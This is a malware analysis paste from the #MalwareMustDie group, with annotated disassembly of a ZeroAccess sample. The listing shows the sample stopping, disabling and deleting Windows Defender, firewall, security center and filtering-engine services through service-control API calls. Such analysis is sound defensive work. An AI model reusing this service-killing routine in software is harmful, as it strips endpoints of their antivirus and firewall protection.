// #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html // In the .text PE section found the operation // to close all processes of : // MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe // @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013 // usage of DisableThreadLibraryCalls : // A function lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls. 0x4017FB push [ebp+hLibModule] ; hLibModule 0x4017FE call ds:DisableThreadLibraryCalls 0x401804 call sub_4016D1 0x401809 test eax, eax 0x40180B jz short loc_401832 // Opening keyroot 0x402659 call ds:ZwOpenKey 0x40265F test eax, eax 0x402661 jl short loc_40267A 0x402663 push offset asc_41D0DC ; " \"" 0x402668 push [ebp+hSCObject] 0x40266B call ds:ZwDeleteValueKey 0x402671 push [ebp+hSCObject] 0x402674 call ds:ZwClose // Using the OpenSCManagerW 0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj 0x40267A push 0F003Fh ; dwDesiredAccess 0x40267F push 0 ; lpDatabaseName 0x402681 push 0 ; lpMachineName 0x402683 call ds:OpenSCManagerW ; Establish a connection to the service ; control manager on the specified computer ; and opens the specified database 0x402689 mov [ebp+hSCObject], eax 0x40268C test eax, eax 0x40268E jz loc_40274B 0x402694 push ebx 0x402695 push esi 0x402696 push edi // opening service "MsMpSvc" 0x402697 mov edi, ds:OpenServiceW 0x40269D mov ebx, 0F01FFh 0x4026A2 push ebx ; dwDesiredAccess 0x4026A3 push offset ServiceName ; "MsMpSvc" 0x4026A8 push eax ; hSCManager 0x4026A9 call edi ; OpenServiceW 0x4026AB test eax, eax 0x4026AD jz short loc_4026B6 0x4026AF mov esi, eax 0x4026B1 call sub_4024E2 // opening service "windefen" 0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j 0x4026B6 push ebx ; dwDesiredAccess 0x4026B7 push offset aWindefend ; "windefend" 0x4026BC push [ebp+hSCObject] ; hSCManager 0x4026BF call edi ; OpenServiceW 0x4026C1 test eax, eax 0x4026C3 jz short loc_4026CC 0x4026C5 mov esi, eax 0x4026C7 call sub_4024E2 // opening service "SharedAccess" 0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj 0x4026CC push ebx ; dwDesiredAccess 0x4026CD push offset aSharedaccess ; "SharedAccess" 0x4026D2 push [ebp+hSCObject] ; hSCManager 0x4026D5 call edi ; OpenServiceW 0x4026D7 test eax, eax 0x4026D9 jz short loc_4026E2 0x4026DB mov esi, eax 0x4026DD call sub_4024E2 0x4026E2 // opening service "iphlpsvc" 0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j 0x4026E2 push ebx ; dwDesiredAccess 0x4026E3 push offset aIphlpsvc ; "iphlpsvc" 0x4026E8 push [ebp+hSCObject] ; hSCManager 0x4026EB call edi ; OpenServiceW 0x4026ED test eax, eax 0x4026EF jz short loc_4026F8 0x4026F1 mov esi, eax 0x4026F3 call sub_4024E2 0x4026F8 // opening service "wscsvc" 0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj 0x4026F8 push ebx ; dwDesiredAccess 0x4026F9 push offset aWscsvc ; "wscsvc" 0x4026FE push [ebp+hSCObject] ; hSCManager 0x402701 call edi ; OpenServiceW 0x402703 test eax, eax 0x402705 jz short loc_40270E 0x402707 mov esi, eax 0x402709 call sub_4024E2 0x40270E // opening service "mpssvc" 0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j 0x40270E push ebx ; dwDesiredAccess 0x40270F push offset aMpssvc ; "mpssvc" 0x402714 push [ebp+hSCObject] ; hSCManager 0x402717 call edi ; OpenServiceW 0x402719 test eax, eax 0x40271B jz short loc_402724 0x40271D mov esi, eax 0x40271F call sub_4024E2 0x402724 // opening service "bfe" 0x402724 loc_402724: ; CODE XREF: sub_402634+E7j 0x402724 push ebx ; dwDesiredAccess 0x402725 push offset aBfe ; "bfe" 0x40272A push [ebp+hSCObject] ; hSCManager 0x40272D call edi ; OpenServiceW 0x40272F test eax, eax 0x402731 jz short loc_40273A 0x402733 mov esi, eax 0x402735 call sub_4024E2 0x40273A // Close them handles.. 0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj 0x40273A push [ebp+hSCObject] ; hSCObject 0x40273D call ds:CloseServiceHandle 0x402743 call sub_402593 0x402748 pop edi 0x402749 pop esi 0x40274A pop ebx // Checking those services... 0x4024E2 sub_4024E2 proc near ; 0x4024E2 0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch 0x4024E2 0x4024E2 sub esp, 1Ch 0x4024E5 push edi 0x4024E6 push 4 0x4024E8 pop edi 0x4024E9 // preparations... 0x4024E9 loc_4024E9: ; 0x4024E9 lea eax, [esp+20h+ServiceStatus] 0x4024ED push eax ; lpServiceStatus 0x4024EE push 1 ; dwControl 0x4024F0 push esi ; hService 0x4024F1 call ds:ControlService ; <==========To control code to a Win32 service 0x4024F7 test eax, eax 0x4024F9 jnz short loc_402516 0x4024FB call ds:GetLastError 0x402501 cmp eax, 41Bh 0x402506 jnz short loc_402516 0x402508 push 3E8h ; dwMilliseconds 0x40250D call ds:Sleep 0x402513 dec edi 0x402514 jnz short loc_4024E9 0x402516 0x402516 loc_402516: 0x402516 xor eax, eax 0x402518 push eax ; lpDisplayName 0x402519 push eax ; lpPassword 0x40251A push eax ; lpServiceStartName 0x40251B push eax ; lpDependencies 0x40251C push eax ; lpdwTagId 0x40251D push eax ; lpLoadOrderGroup 0x40251E push eax ; lpBinaryPathName 0x40251F push eax ; dwErrorControl 0x402520 push 4 ; dwStartType 0x402522 push 20h ; dwServiceType 0x402524 push esi ; hService // stop it all.... 0x402525 call ds:ChangeServiceConfigW <=== triger to change status service.. 0x40252B push esi ; <========value of hService 0x40252C call ds:DeleteService 0x402532 push esi ; <=== value of hSCObject 0x402533 call ds:CloseServiceHandle 0x402539 pop edi 0x40253A add esp, 1Ch 0x40253D retn 0x40253D sub_4024E2 endp --- #MalwareMustDie